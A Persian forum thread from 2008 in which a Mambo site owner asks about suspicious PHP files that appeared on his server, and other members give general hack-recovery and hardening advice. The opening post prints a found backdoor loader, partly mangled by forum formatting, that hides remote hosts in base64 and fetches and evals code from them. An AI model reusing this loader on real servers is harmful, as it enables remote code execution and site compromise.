وجود فایل های مشکوک بر روی سرور من

**merkousha** · 12-21-2008 05:20 PM

چند تا فایل شبیه 149358.php
با فرمت زیر روی سرورم بوجود اومدن می خواستم بدونم که اینا مربوط به مامبو هستن یا اینکه خیر ؟

داخل این فایل ها این کد ها هست :

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_enc ode($b).".".base64_encode($c).".&qu ot;.base64_encode($d).".".base64_encode( $e).".".base64_encode($f).".". base64_encode($g).".".base64_encode($h). ".e.".base64_encode($i).".".ba se64_encode($j);$f=base64_decode("cGhwZmVlZC5 ydQ==&quot

;if (basename($c)==basename($i)&&isset($_REQUE ST["q"])&&md5($_REQUEST["q"])=="2b75fbc4c84029319d9606ca8281eea9&quot

$f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=& quot

.$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cD ovLzcu&quot

.$f.$z))eval($c);else{$cu=curl_init(base64_decode( "aHR0cDovLzcxLg==&quot

.$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1); $o=curl_exec($cu);curl_close($cu);eval($o);}; ?>

**تبلیغات** · 12-21-2008 05:20 PM

**mhadaily** · 12-21-2008 05:24 PM

خیر مربوط به مامبو نیست

**مهدی.** · 12-21-2008 05:43 PM

سلام
هاست شما چيه ؟!

كامروا باشيد.

**merkousha** · 12-21-2008 06:29 PM

unix - free bsd

**مهدی.** · 12-21-2008 07:25 PM

سلام
شما با دقت بشينيد و لاگهاتون رو مطالعه كنيد.
احتمالاً هك شديد.

همچنين از حضور فايلهاي htaccess مشكوك هم مطمئن بشيد.
از سلامت فايلهاي مامبو و يا هر اسكريپت ديگه هم مطمئن بشيد.

يك دوست ديگمون هم به همين شكل قبلاً هك شده بودند كه مشخص نشد دقيقاً مشكل چي بود (لاگها رو نتونستن ببينند) ولي احتمال بسيار زياد از طرف سرور بود و ايشون هك شده بودند. بعد از انتقالب به يك سرور ديگه مشكل رو براشون رفع كرديم.

ولي داخل همه جا اصولاً كاري ميكنند كه به اين سادگيها نميتونيد از شرشون خلاص بشيد.
انشاالله كه مشكل خاصي نباشه. اگر هم بود ميشه حل كردش. نگران نشيد.

كامروا باشيد.

**holyfa** · 12-31-2008 08:18 AM

سلام من می خواستم بدونم که یک سایت مامبویی چطوری هک می شه ! و اگر هک شد چطوری می شه مشکلشو حل کرد یعنی اگر لازم به نصب مجدد مامبو بود چیکار کنیم که اطلاعاتمون بهمراه دسته بندیش از بین نره ...

با تشکر

**مهدی.** · 12-31-2008 08:50 AM

سلام - ماشاالله خيلي به فكر سايتتون هستيد.

از آنجايي كه هنوز هيچ باگي در نسخه 4.6.5 مامبو پيدا نشده پس كسي نميتونه از طريق خوده مامبو اونرو هك كنه.
اما اگر سرور شما سرور امني نباشه يك هكر ميتونه به هاست شما دست پيدا كنه و شما رو هك كنه.
در رابطه با اين كه مشكل چگونه حل شود بايد بگم كه بستگي به هكرتون داره كه چه كار كنه و چه چيزهايي رو خراب كنه.
چندي پيش يكي از دوستان مامبولرن مشكل شما رو داشت و روش حل مشكل رو به ايشون عرض كرديم و الان سايت ايشون بدون هيچ مشكلي داره كار ميكنه.
ايشون هم مامبو و هم SMF نصب شده بر سايتشون هك شده بود و دقيقاً همچون شما هك شده بود.

حالا اگر شما هك شده ايد و ميخواهيد مشكل رو هك كنيد لطفاً بفرماييد تا راه حل آنرا برايتان ارسال كنيم. (اگر مشكل شما همون اسكريپتي است كه در ابتداي تاپيك فرستاديد ابتدا هاست خودتون رو تغيير بديد و يك هاست جديد خريداري كنيد و بقيه موارد رو از اينجا سوال كنيد)

كامروا باشيد.

**سعید** · 12-31-2008 08:58 AM

برای هک شدن مامبو :
1- سرویس دهنده نامعتبر بگیرید.
2- از افزونه هایی که امنیت ندارند استفاده کنید
3- کاربر نابلد برای مدیریتش بذارید یا یکجوری خلاصه رمز عبور رو ...

برای جلوگیری از هک شدن:
1- به نکات امنیتی توجه کنید
2- اون سه تا کار رو نکنید
3- روی پوشه مدیریت پسورد بذارید

اگر نیاز به نصب مجدد مامبو بود:
1- از فایل ها پشتیبان تهیه کنید
2- از بانک اطلاعاتی پشتیبان بگیرید
3- هر دوتا کار رو انجام بدید (یا فول بکاپ بگیرید)

یا علی

**firoozmandan** · 12-31-2008 12:20 PM

[quote author=سعید link=topic=18239.msg97841#msg97841 date=1230713900]
برای هک شدن مامبو :
1- سرویس دهنده نامعتبر بگیرید.
2- از افزونه هایی که امنیت ندارند استفاده کنید
3- کاربر نابلد برای مدیریتش بذارید یا یکجوری خلاصه رمز عبور رو ...

برای جلوگیری از هک شدن:
1- به نکات امنیتی توجه کنید
2- اون سه تا کار رو نکنید
3- روی پوشه مدیریت پسورد بذارید

اگر نیاز به نصب مجدد مامبو بود:
1- از فایل ها پشتیبان تهیه کنید
2- از بانک اطلاعاتی پشتیبان بگیرید
3- هر دوتا کار رو انجام بدید (یا فول بکاپ بگیرید)

یا علی
[/quote]

+ همواره مامبو را بروز نگه دارید

**merkousha** · 12-31-2008 09:24 PM

سلام مجدد خدمت همه ی دوستان !
بالاخره تصمیم بر این شد که به مامبو سرور انتقال بدیم .
یه سری تغییر و تحولات اساسی در سایت مد نظر بچه های تیم مدیریت سایت هست که انشالله تا یکی دو ماه دیگه همه رو اعمال خواهیم کرد !
از همه ی دوستان ممنون.
در مورد این مشکل هم . من پوشه ها رو 777 گذاشته بودم که شخص نفوذ کننده سعی داشته شل بگیره !
به هر حال در اولین فرصتی که بودجه ی هاست جدید آماده بشه ، تغییر سرور خواهیم داد !